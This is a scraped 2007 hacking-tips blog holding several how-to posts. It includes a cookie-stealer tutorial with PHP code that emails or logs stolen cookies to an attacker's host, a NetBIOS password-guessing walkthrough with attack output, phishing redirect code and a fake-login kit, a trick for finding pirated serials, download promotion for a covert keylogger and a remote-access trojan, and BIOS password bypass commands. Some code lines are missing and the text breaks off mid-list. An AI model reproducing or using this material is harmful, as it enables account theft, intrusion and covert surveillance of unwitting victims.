Introduction
Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.
The sender can take many forms. In essense, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.
The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.
Step One: The Code
Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).
As I said in the introduction, the receiver's job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.
Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We'll look at both.
First, let's look at sending it in an email. Here is what such a beast would look like (functioning code):
$cookie = $HTTP_GET_VARS["cookie"]; // line 2
mail("me@mydomain.com", "Cookie stealer report", $cookie); // line 3
?> // line 4
Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to "me@mydomain.com" with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.
Next, we'll look at my preferred method, which is storing the cookie in a logfile. (functioning code)
$cookie = $HTTP_GET_VARS["cookie"]; // line 2
$file = fopen('cookielog.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
?> // line 5
Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.
Step Two: Implementing the Stealer
The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender.
// Line 3
Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).
There are two main ways of implementing the sender:
You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site.
3 0 0 2
Email this • Technorati Links • Subscribe to this feed • Sphere: Related Content • Submit to Propeller • Save to del.icio.us • Add to del.icio.us • Digg This! • Share on Facebook • outside.in: geotag this story • Discuss on Newsvine • Stumble It! •
Posted by Venkatesh Vedhakumar at Sunday, August 12, 2007 1 comments Links to this post
Labels: Hacking tips, Orkut
NetBIOS Hacking
NetBIOS Hacking
This is for an Educational purpose only
All viewers please keep in mind one thing that all this information her is given for informational purpose so please dnt misuse of your knowledge
NetBIOS Attack MethodsThis NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1. One of the components being used is NAT.EXEA discussion of the tool, it switches, and common techniques follows:
NAT.EXE [-o filename] [-u userlist] [-p passlist]
Switches:
-o Specify the output file. All results from the scan
will be written to the specified file, in addition
to standard output.
-u Specify the file to read usernames from. Usernames
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Usernames should appear one per line in the specified file.
-p Specify the file to read passwords from. Passwords
will be read from the specified file when attempting to guess the password on the remote server.
Passwords should appear one per line in the specified file.
Addresses should be specified in comma deliminated
format, with no spaces. Valid address specifications include:
hostname - "hostname" is added
127.0.0.1-127.0.0.3, adds addresses 127.0.0.1
through 127.0.0.3
127.0.0.1-3, adds addresses 127.0.0.1 through
127.0.0.3
127.0.0.1-3,7,10-20, adds addresses 127.0.0.1
through 127.0.0.3, 127.0.0.7, 127.0.0.10 through
127.0.0.20.
hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1
through 127.0.0.1
All combinations of hostnames and address ranges as
specified above are valid.
[8.0.1] Comparing NAT.EXE to Microsoft's own executables
[8.0.2] First, a look at NBTSTAT
First we look at the NBTSTAT command. This command was discussed in earlier portions of the book ( [5.0.6] The Nbtstat Command ). In this section, you will see a demonstration of how this tool is used and how it compares to other Microsoft tools and non Microsoft tools.
What follows is pretty much a step by step guide to using NBTSTAT as well as extra information. Again, if youre interested in more NBSTAT switches and functions, view the [5.0.6] The Nbtstat Command portion of the book.
C:\nbtstat -A XXX.XX.XXX.XX
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
STUDENT1 <20> UNIQUE Registered
STUDENT1 <00> UNIQUE Registered
DOMAIN1 <00> GROUP Registered
DOMAIN1 <1C> GROUP Registered
DOMAIN1 <1B> UNIQUE Registered
STUDENT1 <03> UNIQUE Registered
DOMAIN1 <1E> GROUP Registered
DOMAIN1 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-C0-4F-C4-8C-9D
Here is a partial NetBIOS 16th bit listing:
Computername <00> UNIQUE workstation service name
<00> GROUP domain name
Server <20> UNIQUE Server Service name
Computername <03> UNIQUE Registered by the messenger service. This is the computername
to be added to the LMHOSTS file which is not necessary to use
NAT.EXE but is necessary if you would like to view the remote
computer in Network Neighborhood.
Username <03> Registered by the messenger service.
Domainname <1B> Registers the local computer as the master browser for the domain
Domainname <1C> Registers the computer as a domain controller for the domain
(PDC or BDC)
Domainname <1D> Registers the local client as the local segments master browser
for the domain
Domainname <1E> Registers as a Group NetBIOS Name
Network Monitor Name
Network Monitor Agent
<06> RAS Server
<1F> Net DDE
<21> RAS Client
[8.0.3] Intro to the NET commands
The NET command is a command that admins can execute through a dos window to show information about servers, networks, shares, and connections. It also has a number of command options that you can use to add user accounts and groups, change domain settings, and configure shares. In this section, you will learn about these NET commands, and you will also have the outline to a NET command Batch file that can be used as a primitive network security analysis tool. Before we continue on with the techniques, a discussion of the available options will come first:
[8.0.4] Net Accounts: This command shows current settings for password, logon limitations, and domain information. It also contains options for updating the User accounts database and modifying password and logon requirements.
[8.0.5] Net Computer: This adds or deletes computers from a domains database.
[8.0.6] Net Config Server or Net Config Workstation: Displays config info about the server service. When used without specifying Server or Workstation, the command displays a list of configurable services.
[8.0.7] Net Continue: Reactivates an NT service that was suspended by a NET PAUSE command.
[8.0.8] Net File: This command lists the open files on a server and has options for closing shared files and removing file locks.
[8.0.9] Net Group: This displays information about group names and has options you can use to add or modify global groups on servers.
[8.1.0] Net Help: Help with these commands
[8.1.1] Net Helpmsg message#: Get help with a particular net error or function message.
[8.1.2] Net Localgroup: Use this to list local groups on servers. You can also modify those groups.
[8.1.3] Net Name: This command shows the names of computers and users to which messages are sent on the computer.
[8.1.4] Net Pause: Use this command to suspend a certain NT service.
[8.1.5] Net Print: Displays print jobs and shared queues.
[8.1.6] Net Send: Use this command to send messages to other users, computers, or messaging names on the network.
[8.1.7] Net Session: Shows information about current sessions. Also has commands for disconnecting certain sessions.
[8.1.8] Net Share: Use this command to list information about all resources being shared on a computer. This command is also used to create network shares.
[8.1.9] Net Statistics Server or Workstation: Shows the statistics log.
[8.2.0] Net Stop: Stops NT services, cancelling any connections the service is using. Let it be known that stopping one service, may stop other services.
[8.2.1] Net Time: This command is used to display or set the time for a computer or domain.
[8.2.2] Net Use: This displays a list of connected computers and has options for connecting to and disconnecting from shared resources.
[8.2.3] Net User: This command will display a list of user accounts for the computer, and has options for creating a modifying those accounts.
[8.2.4] Net View: This command displays a list of resources being shared on a computer. Including netware servers.
[8.2.5] Special note on DOS and older Windows Machines: The commands listed above are available to Windows NT Servers and Workstation, DOS and older Windows clients have these NET commands available:
Net Config
Net Diag (runs the diagnostic program)
Net Help
Net Init (loads protocol and network adapter drivers.)
Net Logoff
Net Logon
Net Password (changes password)
Net Print
Net Start
Net Stop
Net Time
Net Use
Net Ver (displays the type and version of the network redirector)
Net View
For this section, the command being used is the NET VIEW and NET USE commands.
[8.2.6] Actual NET VIEW and NET USE Screen Captures during a hack.
C:\net view XXX.XX.XXX.XX
Shared resources at XXX.XX.XXX.XX
Share name Type Used as Comment
------------------------------------------------------------------------------
NETLOGON Disk Logon server share
Test Disk
The command completed successfully.
NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown.
C:\net use /?
The syntax of this command is:
NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]
NET USE [devicename | *] [password | *]] [/HOME]
NET USE [/PERSISTENT:{YES | NO}]
C:\net use x: \\XXX.XX.XXX.XX\test
The command completed successfully.
C:\unzipped\nat10bin>net use
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK X: \\XXX.XX.XXX.XX\test Microsoft Windows Network
OK \\XXX.XX.XXX.XX\test Microsoft Windows Network
The command completed successfully.
Here is an actual example of how the NAT.EXE program is used. The information listed here is an actual capture of the activity. The IP addresses have been changed to protect, well, us.
C:\nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY
[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt
[*]--- Checking host: XXX.XX.XXX.XX
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:
Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]
[*]--- Obtained listing of shares:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share
Test Disk:
[*]--- This machine has a browse list:
Server Comment
--------- -------
STUDENT1
[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access
If the default share of Everyone/Full Control is active, then you are done, the server is hacked. If not, keep playing. You will be surprised what you find out.
Source: taksaalisingh
0 0 0 1
Email this • Technorati Links • Subscribe to this feed • Submit to Propeller • Save to del.icio.us • Add to del.icio.us • Digg This! • Share on Facebook • outside.in: geotag this story • Discuss on Newsvine • Stumble It! •
Posted by Venkatesh Vedhakumar at Sunday, August 12, 2007 1 comments Links to this post
Labels: Hacking tips
Hacking Hotmail / MSN
Hacking Hotmail
Introduction
We all use Hotmail!!!well its one of my Favorites.
Here m going to reveal n Alert About how the Unethical Hackers Can cheat us.
This Page is meant for Educational Purpose only. I do not Endorse Hacking at all but its Meant for knowing the Threats n Protect yourself also Curbing them
Topics
1:- How hotmail can be hacked with fake login screen (2 different ways)
2:- Fake e-mails threats
3:- Detect a fake message into hotmail
4:- How to get persons ip address through msn messenger
5:- curbing the way hackers get the passwords
6:- Easiest Way
7:- Change msn messenger title
8:- Protect yourself from Virus
9:- Hoax Toolbox v1.1
1) Protect yourself from Phishing
Usually The Unethical Hackers Upload their hotmail's fake login screen on a web server and then send these codes
to the victim from yahoo or another mail sending program. The codes are
< script>
location.href="http://www.yoursite.com/yourhotmailfakepage.html\/"
< /script>
and the user will be automatically redirected to your fake hotmail screen from their e-mail box & you r Hacked.
Beware of There Threats
2) Beware of Fake Login Screens
They Start chatting with your victim and send him the fake login screen through Their messenger and try to pish you.
there are many many of them available on the net.. which are usually small Visual Basic programs.. never reveal your password anywhere other than the latest Versions of msn Messengers.
3) Fake e-mails threats
This is very easy go to http://www.boxfrog.com/ register( its blocked now) but there are many others .. google u ll find many click on create message and in from filed type in any ones e-mail address and the message will be sent.
there's also a simple way of doing this by Telnet ting from the dos Prompt.
Beware of this Threat .. make your spam protection Powerful
4) Detect a fake message into Hotmail inbox
This is Simple Buddies.. open your e-mail box go to options select display setting or message display setting or (some thing like this) now select full where it says message display settings or something like this. Open the mail which u thought to be fake now in the last where it says from u can see the address of that site from where the mail is sent but if some one has sent it through some sort of program it will tell u his ip. n once you know D ip m sure u know how to go between it there after
IMP: Read the ip address log from Backwards.
5) Protect urself revealing your ip address through msn messenger
When you Open your messenger start chatting with friend open ms dos and type netstat -n there do not press enter and then minimize it after this send something to your victim and as soon as he accept it the hotmail messenger will say connecting this is the time when u re maximize your MS-DOS and
press enter the ip address next to time wait: will the friends ip. U may be Hacked The same way
Beware!!
HoaX Toolbox v1.1
This is a PHP script that creates a website with an admin area that allows the user to choose between fake login pages of MSN Messenger, Hotmail, Yahoo and Google Mail, once you set up the script on a server that has PHP and SQL you will be able to log in the administration page and choose the fake login page to display to the main site, when the victim tries to log-in their mail/messenger, the website keeps the user/pass information in a log file that you can view anytime from the admin area, if the victim is not stupid enough to add their real log-in because they read the URL of your server instead of reading hotmail.com or yahoo.com in the URL bar then remember you can pop-up the main page of the site and disable the URL bar on the explorer, so when the user clicks on your real site the link "Yahoo Mail" an explorer without URL bar pops up, if you don't know how to pop up customized browsers search google
Hacking MSN
Small yet working trick
Hacking MSN is actually VERY simple. Msn is designed to route the connection through a Microsoft server while you are chatting. However, when a file is sent, a DCC (direct connection) is created. This was purposely done because otherwise Microsoft would waste a lot of bandwidth so a direct connection is made. This is your chance. Make a file transfer occur between u and a victim (try to send a big file), open up your command prompt (run "cmd" in NT/XP or "command" in 9X to get into prompt) and run netstat. usually the MSN targets IP would be above port 2000. enjoy.
If u receive some crap like gux1-43.primus.com as the target, do a reverse DNS lookup on it. However, this occurs very rarely, mostly u will receive a clear IP.
Once u have d IP u can do anything with him by Fingerprinting.
U can protect yourself from this occurring to you by using a proxy with MSN (under connections panel in options).
Source: taksaalisingh
3 0 0 0
Email this • Technorati Links • Subscribe to this feed • Sphere: Related Content • Submit to Propeller • Save to del.icio.us (1 save) • Add to del.icio.us • Digg This! • Share on Facebook • outside.in: geotag this story • Discuss on Newsvine • Stumble It! •
Posted by Venkatesh Vedhakumar at Sunday, August 12, 2007 7 comments Links to this post
Labels: Hacking tips, Uploads and Emails Related
Rapidshare Downloader
CMS Grabber is the best tool I ever found on internet, this tool made me stun when I started using this, many rapid share users are still searching for free premium account, this tool make it useless. Using this tool we can download files from rapid share without any download limitations, multiple files at once, this is more than rapid share premium account. Lets see it in brief
THE ONLY LEGAL PROGRAM FOR DOWNLOADS FROM RAPIDSHARE !!!
Bypasses download limitations. Download multiple files at once. Download even more than with premium !
This release is sponsored by StackFile Corp.
What's new
- fixed rapidshare.com grabber
- fixed rapidshare.com link checker
- added huawei tool for renewing IP address for ADSL users(Supported hardware: SmartAX MT882 ADSL Router/Modem) - currently we support only USB mode, next version will alow to specify router address (it is now set to 192.168.1.2 -- you can configure your router to that address anyway so it will work in "Network Mode" -- i.e. when connected to the LAN NIC))
This release is sponsored by StackFile Corp and coded by SpongeBob.
NOTE: This program is not Vista compatible, but works fine with disabled UAC (User Account Control - very useful and inovative thing which renders your computer useless and annoying to use it).
Download from here
Homepage: CMSzone
The Home of grabber
1 0 0 1
Posted by Venkatesh Vedhakumar at Sunday, August 12, 2007 6 comments Links to this post
Labels: Hacking tips, Hacking Tools, Internet Related, Rapidshare / Megaupload, Software
Friday, August 10, 2007
Use Google to get Serial No of any Software
Most of the people downloading trial and using it, only after the expiration of trial they try for crack, Serial No, Keygen, Patch....
But many don't known where to get Serial No, Some websites may be infect your system with Trojan horse, Viruses, Ad ware, Spy ware....
So for beginners this is a simply way to find hack with less effort and it saves time to, But make sure you have anti virus activated before trying to get some Serials, Patches to avoid data loss
Just follow the steps as instructed below
1) Go to http://www.google.com
2) type this syntax in search bar " 94FBR"
3) Replace Product name with desired software and leave a space then type 94FBR
4) Press enter, thats it
Now you receive Many pages which contains Serial no, Crack, Patches....
Just make a try, this simple trick works for many people
0 1 0 1
Posted by Venkatesh Vedhakumar at Friday, August 10, 2007 0 comments Links to this post
Labels: Google, Hacking tips
Thursday, August 2, 2007
Hack passwords in Firefox
Whenever you log in to a website using your username and password, you'll be prompted by Firefox whether you'd like Firefox to remember this password.
If you click on Remember, the next time you visit the website, it'll automatically enter the username and password for your convenience.
Now, back to the topic. Let's say you saved your GMail password in Firefox. After months or years gone by and you don't remember the password you set for my GMail. You started to panic and desperately need to get back your GMail password.
Don't worry, here's how you can find the hidden GMail password in Firefox.
Firefox is much better than Internet Explorer in terms of managing "remembered" logins. In Internet Explorer, there is no built-in feature where you can manage or view your saved login information. That's why you need third party tools to reveal the passwords hidden under asterisks. As for Firefox, you can access remembered passwords with a few clicks.
To view your remembered passwords in Firefox browser, go to Tools, and click on Options. Go to Security tab and click on the Show Passwords button. A remember password dialog box will appear. Click on the Show Passwords button again and a new column with password will appear.( source )
0 2 0 0
Posted by Venkatesh Vedhakumar at Thursday, August 02, 2007 0 comments Links to this post
Labels: Firefox, Hacking tips
Monday, July 16, 2007
Language of Hackers
Hacker Language
Language helps re-enforce the barrier between computer hackers and non-hackers, as well as that between hackers and crackers. Computer hackers have developed their own language. Firstly there is vocabulary that non-hackers will not know (TCP, IP, winsock, Linux, root access, vi, etc) due to a lack of computer-related knowledge. Secondly, some computer hackers have modified English with a set of conventions. Hackers replace ‘f’ with ‘ph’ (likely coming from phreaks who were interested in ‘ph’ones), and ‘s’ with ‘z’. Also hackers use numbers in place of letters such as ‘1’ for ‘i’ or ‘l’ (though replacing ‘i’ is not the proper usage), ‘3’ for ‘E,’ ‘4’ for ‘a’, and ‘7’ for ‘t.’ Also it is important to use random caPitAlizaTioN, abbreviation, slang, emphasize words by putting ‘k-‘ before them ("k-rad"), and finish a statement with a series of characters for emphasis.
Take this example from an Internet Relay Chat message in a hacking group (#hack):
Google For Hackers! - The top video clips of the week are here
c4n sUm1 h31p m3 w1tH h4x0RiNg mY sk00lz c0mPz?!?!?!!?!?
Which translates to: " can someone help me with hacking my school’s computers?"
1 0 0 0
Posted by Venkatesh Vedhakumar at Monday, July 16, 2007 0 comments Links to this post
Labels: Google, Hacking tips
Monday, July 9, 2007
Ways to change Users password
How to Bypass a Windows XP Password Without any Programs
Another way to change user passwords
0 0 0 0
Posted by Venkatesh Vedhakumar at Monday, July 09, 2007 0 comments Links to this post
Labels: Hacking tips
Ways to Bypass Spector pro
Spector Pro Removal Instructions
Spector General Description:
Spector Pro is spyware with specialized keylogging functions. Spector Pro contains seven integrated tools that record your chatroom conversations, your instant messages, your emails sent and received, web sites visited, your keystrokes typed, programs launched, and peer-to-peer file searching and swapping. Spector Pro also provides the equivalent of a digital surveillance tape so that the exact sequence of everything you do on the computer may be viewed. All seven tools work together at the same time, secretly saving all the recordings in a hidden location for the anonymous user.
More details about this software
This manual removal process is difficult and you run the risk of destroying your computer. We recommend that you use SpyHunter's Spyware Scanner.
Remove Spector processes:
webebot.exe
winnetcl.exe
Unregister Spector DLL files:
netknl.dll
netknlhm.dll
Detect and Delete these Spector files:
webebot.exe
winnetcl.exe
netknl.dll
netknlhm.dll
_msfilea.txt
599ca53a.tmp
winnetcl.cnt
winnetcl.hlp
Our Recommendation:
To avoid the unnecessary risk of damaging your computer, we highly recommend you use a good spyware cleaner/remover to track Spector and automatically find and remove other spyware, adware, trojans, and viruses in your PC.
Spector Automatic Detection:
Download Spector RemoverDownload SpyHunter's Free Spector scanner.
0 0 0 1
Posted by Venkatesh Vedhakumar at Monday, July 09, 2007 1 comments Links to this post
Labels: Hacking tips
Automatically Record everthing typed on PC and Net
The ONLY Keystroke Logger that Secretly Records Web Sites, Instant Messages, PASSWORDS, and MUCH More!
Spector Pro is the keystroke logger that will record ANY keystroke typed, chat and instant messages, web sites visited, emails, P2P activity, programs launched, online searches, MySpace activity, and visual snapshot recording. PLUS a detailed overview of everything they do the most!
Spector Pro is the BEST Keystroke Logger available anywhere - PERIOD!
Additionally, Spector Pro will examine and analyze the recordings and determine if you should be NOTIFIED IMMEDIATELY.
When it comes to having the most comprehensive keystroke logger, Spector Pro is EXACTLY what you need.
Spector Pro is the world’s best selling software for monitoring and recording every detail of PC and Internet activity – in your home or in your office. Selected as the Editors’ Choice by the experts at PC Magazine, Spector Pro records every detail of what they do on the computer – their chats, instant messages, emails, the web sites they visit, what they search for, what they do on MySpace, the pictures they post and look at, the keystrokes they type, the programs they run and much more. And because of its advanced surveillance screen snapshot features, you get to see not only WHAT they do, but the EXACT order in which they do it, step by step. With Spector Pro, you will never doubt who is doing what on the computer.
In addition to monitoring and recording, Spector Pro has an advanced warning system that will inform you when a PC being monitored has been used in an inappropriate manner. Through the use of keywords and phrases that you specify, Spector Pro will be "on alert", emailing you an immediate and detailed report of when, where and how a keyword was used - every time it is typed or appears on the PC, on a web site, in a chat/instant message or in an email. Alerts are sent to your office, home, cell phone or wherever you want.
Complete Power. Complete Flexibility. You are in Control.
Spector Pro has become the gold standard in Internet monitoring software because of its ease of installation and use, and its comprehensive recording capabilities of just about every kind of Internet activity. With Spector Pro you will know who is using your PC, what they are doing online and ultimately... take back control of your home or office computer.
Whant to read more about this product click here
To Buy this software Click here
Download this software "Click Here to download v5.0" ( Download link provided by SkillWare )
Download this software "Click Here to download v6.0" ( Download link provided by Download planet )
1 0 0 0
Posted by Venkatesh Vedhakumar at Monday, July 09, 2007 0 comments Links to this post
Labels: Hacking tips, Windows tips and tricks
Saturday, July 7, 2007
Flux Hacking Kit v1.0
This is the first release of a remote administration tool named Flux.
This application allows you to administer a remote computer, capable of bypassing a router or
protected by a firewall.
Features:
- FWBP+ (can inject to default browser, msn messenger or up to three specified applications)
- Persistent server (server is hard to remove, it will be rerun when closed,
rewritten when deleted, readded to registry when removed)
- Startup method: Registry run + ActiveX + Flux-special.
- Installs to windows or system directory.
- Up to three specified ports in client can listen for connections.
- Up to three specified IPs can be used for connection
- Up to three specified URLs can be used to connection on
- File manager (uses caches to speed up browsing, supports download resuming)
- Screen capture, uses either jpeg-compression or diff. calculation
to stream users desktop (both included in basic server)
- Cam capture (opt. to save caps)
- Keylogger (opt. to log in background)
- Passwordsniffer (logs all text entered into password/***-boxes)
- Find files
- Task list (can capture a certain window or control)
- Process list
- SOCKS4
- Show message box
- Execution file from URL
- Connection is encrypted with a 1024-bit key
Download
Add-on
0 0 0 0
Posted by Venkatesh Vedhakumar at Saturday, July 07, 2007 0 comments Links to this post
Labels: Hacking tips
Tuesday, June 12, 2007
Clear BIOS Password, All tricks !
At command prompt type debug
you will get a - prompt where you can type the fallowing ( means hit enter, not type enter*)
A
MOV AX,0
MOV AX,CX
OUT 70,AL
MOV AX,0
OUT 71,AL
INC CX
CMP CX,100
JB 103
INT 20
just hit enter on this line
G
Q
Basic BIOS password crack - works 9.9 times out of ten
This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following:
Get DOS prompt and type:
DEBUG hit enter
-o 70 2e hit enter
-o 71 ff hit enter
-q hit enter
exit hit enter
Restart the computer. It works on most versions of the AWARD BIOS.
Accessing information on the hard disk
When you turn on the host machine, enter the CMOS setup menu (usually you have to press F2, or DEL, or CTRL+ALT+S during the boot sequence) and go to STANDARD CMOS SETUP, and set the channel to which you have put the hard disk as TYPE=Auto, MODE=AUTO, then SAVE & EXIT SETUP. Now you have access to the hard disk.
Standard BIOS backdoor passwords
The first, less invasive, attempt to bypass a BIOS password is to try on of these standard manufacturer's backdoor passwords:
AWARD BIOS
AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet, %øåñòü ïpîáåëîâ%, %äåâÿòü ïpîáåëîâ%
AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder
Other passwords you may try (for AMI/AWARD or other BIOSes)
LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj
Note that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards (such as Italian and German ones), so -- for example -- you should type AWARD?SW when using those keyboards. Also remember that passwords are Case Sensitive. The last two passwords in the AWARD BIOS list are in Russian.
Flashing BIOS via software
If you have access to the computer when it's turned on, you could try one of those programs that remove the password from the BIOS, by invalidating its memory.
However, it might happen you don't have one of those programs when you have access to the computer, so you'd better learn how to do manually what they do. You can reset the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the command prompt. You'd better do it in pure MS-DOS mode, not from a MS-DOS shell window in Windows). Once you are in the debug environment enter the following commands:
AMI/AWARD BIOS
O 70 17
O 71 17
Q
PHOENIX BIOS
O 70 FF
O 71 17
Q
GENERIC
Invalidates CMOS RAM.
Should work on all AT motherboards
(XT motherboards don't have CMOS)
O 70 2E
O 71 FF
Q
Note that the first letter is a "O" not the number "0". The numbers which follow are two bytes in hex format.
Flashing BIOS via hardware
If you can't access the computer when it's on, and the standard backdoor passwords didn't work, you'll have to flash the BIOS via hardware. Please read the important notes at the end of this section before to try any of these methods.
Using the jumpers
The canonical way to flash the BIOS via hardware is to plug, unplug, or switch a jumper on the motherboard (for "switching a jumper" I mean that you find a jumper that joins the central pin and a side pin of a group of three pins, you should then unplug the jumper and then plug it to the central pin and to the pin on the opposite side, so if the jumper is normally on position 1-2, you have to put it on position 2-3, or vice versa). This jumper is not always located near to the BIOS, but could be anywhere on the motherboard.
To find the correct jumper you should read the motherboard's manual.
Once you've located the correct jumper, switch it (or plug or unplug it, depending from what the manual says) while the computer is turned OFF. Wait a couple of seconds then put the jumper back to its original position. In some motherboards it may happen that the computer will automatically turn itself on, after flashing the BIOS. In this case, turn it off, and put the jumper back to its original position, then turn it on again. Other motherboards require you turn the computer on for a few seconds to flash the BIOS.
If you don't have the motherboard's manual, you'll have to "brute force" it... trying out all the jumpers. In this case, try first the isolated ones (not in a group), the ones near to the BIOS, and the ones you can switch (as I explained before). If all them fail, try all the others. However, you must modify the status of only one jumper per attempt, otherwise you could damage the motherboard (since you don't know what the jumper you modified is actually meant for). If the password request screen still appear, try another one.
If after flashing the BIOS, the computer won't boot when you turn it on, turn it off, and wait some seconds before to retry.
Removing the battery
If you can't find the jumper to flash the BIOS or if such jumper doesn't exist, you can remove the battery that keeps the BIOS memory alive. It's a button-size battery somewhere on the motherboard (on elder computers the battery could be a small, typically blue, cylinder soldered to the motherboard, but usually has a jumper on its side to disconnect it, otherwise you'll have to unsolder it and then solder it back). Take it away for 15-30 minutes or more, then put it back and the data contained into the BIOS memory should be volatilized. I'd suggest you to remove it for about one hour to be sure, because if you put it back when the data aren't erased yet you'll have to wait more time, as you've never removed it. If at first it doesn't work, try to remove the battery overnight.
Important note: in laptop and notebooks you don't have to remove the computer's power batteries (which would be useless), but you should open your computer and remove the CMOS battery from the motherboard.
Short-circuiting the chip
Another way to clear the CMOS RAM is to reset it by short circuiting two pins of the BIOS chip for a few seconds. You can do that with a small piece of electric wire or with a bent paper clip. Always make sure that the computer is turned OFF before to try this operation.
Here is a list of EPROM chips that are commonly used in the BIOS industry. You may find similar chips with different names if they are compatible chips made by another brand. If you find the BIOS chip you are working on matches with one of the following you can try to short-circuit the appropriate pins. Be careful, because this operation may damage the chip.
CHIPS P82C206 (square)
Short together pins 12 and 32 (the first and the last pins on the bottom edge of the chip) or pins 74 and 75 (the two pins on the upper left corner).
gnd
74
|__________________
5v 75--| |
| |
| |
| CHIPS |
1 * | |
| P82C206 |
| |
| |
|___________________|
| |
| gnd | 5v
12 32
OPTi F82C206 (rectangular)
Short together pins 3 and 26 (third pin from left side and fifth pin from right side on the bottom edge).
80 51
|______________|
81 -| |- 50
| |
| |
| OPTi |
| |
| F82C206 |
| |
100-|________________|-31
|| | |
1 || | | 30
3 26
Dallas DS1287, DS1287A
Benchmarq bp3287MT, bq3287AMT
